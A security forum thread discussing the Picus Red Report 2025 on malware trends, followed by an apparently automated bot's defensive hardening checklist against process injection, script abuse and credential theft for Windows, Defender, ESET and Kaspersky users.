Serious Discussion Pico Red Report 2025

[Victor M]

Pico's Red Report deals with trends in malware and attack tatics.

Picus Labs processed more than 1 million pieces of malware collected between January and December 2024 to reveal a comprehensive view of the latest tactics, techniques, and procedures being employed by adversaries across the planet. Each detected TTP was classified via the MITRE ATT&CK® Framework, which resulted in the identification of over 14 million malicious actions. This provided Picus with extremely granular insight into the most commonly deployed techniques, shedding light on critical information concerning these constantly shifting attack strategies. Among these, the most striking is that this yearʼs Red Report reveals that malware, specifically strains targeting credential stores, increased from 8% in 2023 to 25% in 2024, thus a 3X surge in prevalence, a fact that highlights the popularity and success of this emerging threat.

The Red Report also reveals that 93% of 2024ʼs malicious actions were carried out using the top ten MITRE ATT&CK techniques. These findings will help security teams make better-informed decisions and concentrate on defending against the most prevalent threats in today's cyber environment

Stealth Techniques Continue to Dominate:
Evasion and Persistence at the Core
T1055 Process Injection, seen in 31% of analyzed samples, shows further
movement to stealthier approaches as code injected into a legitimate
process evades detection in many security solutions. In addition, T1059
Command and Scripting Interpreter stands out among the top techniques
that allow attackers to conduct malicious operations through native tools,
such as PowerShell and Bash.

The Red Report 2025

The Red Report 2025™ reveals the tripling of malware targeting credentials from password stores. Discover the top 10 MITRE ATT&CK® techniques to defend against complex cyber threats.

www.picussecurity.com

See how to deal with T1055 Process Injection here: Advanced Plus Security - Victor M ESET based Persistence Stopping detailed Config

 

[Bot]

The Red Report 2025

The Red Report 2025™ reveals the tripling of malware targeting credentials from password stores. Discover the top 10 MITRE ATT&CK® techniques to defend against complex cyber threats.

www.picussecurity.com

See how to deal with T1055 Process Injection here: Advanced Plus Security - Victor M ESET based Persistence Stopping detailed Config

Interesting share – thanks for posting the excerpt and link.

A few key takeaways from what you quoted

• Credential‑stealing malware is exploding: jumping from 8% to 25% of samples in just one year is huge. That likely includes:
  • Stealers targeting browser password stores
  • Password managers / secure vaults
  • Windows Credential Manager and DPAPI‑protected data
  • Session tokens / cookies (for “passwordless” logins)
• A small number of TTPs dominate: 93% of malicious actions mapped to just the top 10 ATT&CK techniques. That’s actually good news for defenders – hardening a relatively small set of techniques can reduce a lot of risk.
• Stealth > everything else: process injection (T1055) and command/scripting (T1059) are still core tools of the trade.

T1055 – Process Injection

What the report says matches what has been seen for years: injecting into a legitimate process is still one of the most reliable ways to:

• Hide malicious code inside trusted processes (e.g. browser, explorer, system processes)
• Bypass simple application allow‑lists
• Evade basic AV/EDR that focuses more on “what started” than “what it’s doing now”

Defending against T1055 fully is hard, but you can raise the bar significantly with:

• EDR/AV with strong behavior monitoring for memory injections, hollowing, APC injection, etc.
• Tight HIPS / advanced rules (like in your linked ESET config) watching:
  • Processes modifying the memory of other processes
  • Suspicious use of APIs like WriteProcessMemory, CreateRemoteThread, etc.
• Application hardening & isolation (e.g. browser sandboxing, limiting which processes are allowed to talk to each other)

Your linked thread on Victor M ESET based Persistence Stopping detailed Config is a good example of the kind of “extra” hardening needed if someone wants more than default protection against things like process injection and persistence tricks.

T1059 – Command and Scripting Interpreter

Attackers leaning heavily on PowerShell, CMD, Bash and other interpreters is very consistent with “living off the land”:

• Native tools are already trusted and whitelisted
• Scripts are easier to change than binaries
• In-memory execution keeps disk artefacts minimal

On Windows specifically, useful mitigations include:

• PowerShell logging (Script Block, Module, and Transcription logging) so you can actually see what’s happening
• Constrained Language Mode (for non‑admin / untrusted contexts)
• AppLocker or WDAC rules limiting who/what can run PowerShell, cscript/wscript, etc.
• Block or monitor LOLBins (regsvr32, mshta, wmic, rundll32, etc.) where possible

What this means practically for home / power users

For people here on MalwareTips, a few practical implications:

• Focus more on credential security:
  • Use a reputable password manager (with strong master password and MFA)
  • Avoid storing important passwords in the browser if possible
  • Treat cookie/session theft as seriously as password theft (secure browser profile, OS hardening)
• Don’t rely only on signatures: use products with good behavior blocking, exploit protection and memory inspection.
• Harden your main browser / daily-use apps: that’s where a lot of process injection and credential stealing focuses.
• If you’re comfortable tweaking configs: threads like the Victor M ESET config are worth studying and adapting carefully, but always test changes and keep backups of your configuration.

Overall, the Red Report snippet basically confirms that attackers are doubling down on:

• Stealing what matters most (credentials/sessions)
• Hiding inside what you already trust (injected processes, native interpreters)

If you’d like, I can help translate some of the top MITRE techniques from the report into concrete hardening steps for a specific product you use (ESET, Kaspersky, Defender, etc.).

 

[Victor M]

sure @Bot, go ahead and generate those hardening techniques

 

[Bot]

sure @Bot, go ahead and generate those hardening techniques

Here’s a practical hardening checklist mapped to the main techniques you quoted (Windows‑focused, home/power‑user level).

I’ll cover:

• General OS/app hardening
• Extra steps for Microsoft Defender, ESET, and Kaspersky

If you tell me what you actually use, I can later condense this into a short, product‑specific checklist.

1. T1055 – Process Injection

Goal: Make it harder for malware to inject into trusted processes (browsers, system processes, etc.) and stay hidden.

General Windows hardening

• Keep Windows + browsers fully updated (exploit → code exec → injection).
• Run as standard user for daily work (not an admin account).
• Limit software that hooks into everything (game overlays, “tuners”, multiple AVs, shady injectors).
• Use exploit protection (Windows Security → App & browser control → Exploit protection):
  • Ensure DEP, ASLR, CFG are On by default.
  • Optionally add per‑app hardening for browsers, PDF reader, office suite.

Microsoft Defender

• Make sure Real‑time protection, Cloud‑delivered protection, and Automatic sample submission are On.
• Turn on Attack Surface Reduction (ASR) rules where possible (Windows Security → App & browser control → Exploit protection → “Attack surface reduction”). Rules that help against injection/exploitation:
  • “Block Office applications from injecting code into other processes”
  • “Block Office applications from creating executable content”
  • “Block all Office applications from creating child processes” (more for T1059, but also limits injection chains)
• If you’re comfortable with PowerShell/Group Policy, configure those ASR rules in Block mode rather than Audit.

ESET (NOD32 / Internet Security / Smart Security Premium)

• Ensure HIPS is Enabled and in at least Smart protection mode.
• Under Advanced setup → Detection engine:
  • Advanced Memory Scanner – Enabled
  • Exploit Blocker – Enabled and set to Aggressive if you can tolerate potential extra prompts
• If you are advanced/patient:
  • Create HIPS rules to ask/deny when non‑trusted apps try to:
    • Modify other process’ memory
    • Inject code / create threads in other processes
  • The Victor M config you linked is a solid template; adapt it rather than starting from zero.

Kaspersky (Standard / Plus / Premium, etc.)

• Ensure System Watcher is Enabled (core for behavior/memory monitoring).
• In Intrusion Prevention / Application Control:
  • Keep default mode or stricter (e.g. “High”).
  • Unknown/untrusted apps: restrict their ability to interact with other processes.
• Do not disable heuristics or “Advanced Disinfection” – these help with injected code inside legit processes.

2. T1059 – Command & Scripting Interpreter (PowerShell, CMD, scripts)

Goal: Make it hard for malware/macro documents to abuse PowerShell/CMD/other interpreters silently.

General Windows hardening

• Uninstall PowerShell v2 (Features → “Turn Windows features on or off”) – it lacks modern logging/security.
• Treat .ps1 / .vbs / .js files as dangerous:
  • Don’t double‑click random scripts
  • View extension for known file types (disable “Hide extensions…” in Explorer)
• If you’re advanced, consider:
  • AppLocker or WDAC to allow PowerShell only for admins or from certain paths.
  • PowerShell Constrained Language Mode for non‑admin users.

Microsoft Defender

• Enable relevant ASR rules (again: App & browser control → Attack surface reduction):
  • “Block all Office applications from creating child processes” (stops Word/Excel spawning Powershell/CMD)
  • “Block Office applications from creating executable content”
  • “Block JavaScript or VBScript from launching downloaded executable content”
  • “Block executable content from email client and webmail”
• For visibility, enable PowerShell logging (if you have Pro/Enterprise and are comfortable with gpedit.msc):
  • Script Block Logging
  • Module Logging

ESET

• In Advanced setup → Detection engine, make sure Script Scanner is enabled (if available in your edition).
• Use HIPS rules to control interpreters:
  • Prompt or block when powershell.exe, wscript.exe, cscript.exe are started by:
    • Office apps (winword.exe, excel.exe)
    • Browsers (chrome.exe, msedge.exe, firefox.exe)
    • Archive managers (winrar.exe, 7zFM.exe, etc.)
• Optionally, restrict script engines to admin use only on your system via HIPS.

Kaspersky

• Ensure Script Monitoring / “Monitoring of application activities” is enabled.
• In Application Control:
  • Place PowerShell, wscript/cscript in a stricter group (e.g. “Low restricted”).
  • Block or prompt when Office/browsers launch PowerShell or CMD (you can create custom rules based on parent process).

3. Credential Theft & Stealer Malware

Goal: Protect browser‑stored passwords, password managers, cookies/sessions, and OS credentials (LSASS, DPAPI).

General practices

• Use a reputable password manager with:
  • Strong master password
  • MFA (if cloud‑syncing)
  • Short auto‑lock timeout
• Minimize storing important passwords in the browser. If you must:
  • Use a separate, locked browser profile for high‑value sites (banking, email, admin panels).
• Turn on full‑disk encryption (BitLocker) where possible.
• Avoid running random “stealer‑friendly” things: cracked software, cheat tools, unknown “optimizers”.

Microsoft Defender

• Enable ASR rule “Block credential stealing from LSASS” (very important).
• On Windows Pro/Enterprise (and compatible hardware):
  • Turn on Credential Guard if available.
  • Enable LSA protection (RunAsPPL) – this makes dumping LSASS harder.
• Keep SmartScreen enabled in both Edge and Windows (reduced chance of running stealers in the first place).

ESET

• Keep Web access protection and Antiphishing enabled to cut off many stealer delivery vectors.
• Use Banking & Payment Protection for financial/banking sites (isolated hardened browser window).
• If using ESET Password Manager, enable:
  • Strong master password
  • 2FA
  • Short auto‑lock time
• Optionally create HIPS rules to:
  • Prevent non‑browser apps from accessing browser profile folders
  • Block unknown apps from reading password manager database locations

Kaspersky

• Use Safe Money for banking and key financial sites (runs them in a hardened mode).
• Ensure System Watcher is On – it can detect many stealer behaviors (e.g. grabbing browser data, suspicious memory reads).
• If using Kaspersky Password Manager:
  • Enable 2FA if supported
  • Set strict auto‑lock
• In Application Control, block untrusted apps from:
  • Accessing browser profile folders
  • Accessing credential‑related files in AppData

4. Persistence (autoruns, WMI, tasks) – quick note

Even though you didn’t quote a specific ATT&CK ID here, persistence is closely linked.

Quick wins:

• Defender: enable ASR rule “Block persistence through WMI event subscription”.
• Periodically check startup items with tools like Autoruns (careful what you disable).
• Avoid running software that insists on auto‑starting unless you really need it.

---

If you tell me:

• Your OS version (e.g. Windows 10/11 Home/Pro)
• Your main AV (Defender/ESET/Kaspersky/other)

I can turn this into a short, concrete “do this / click here / set this to X” checklist tailored to your setup.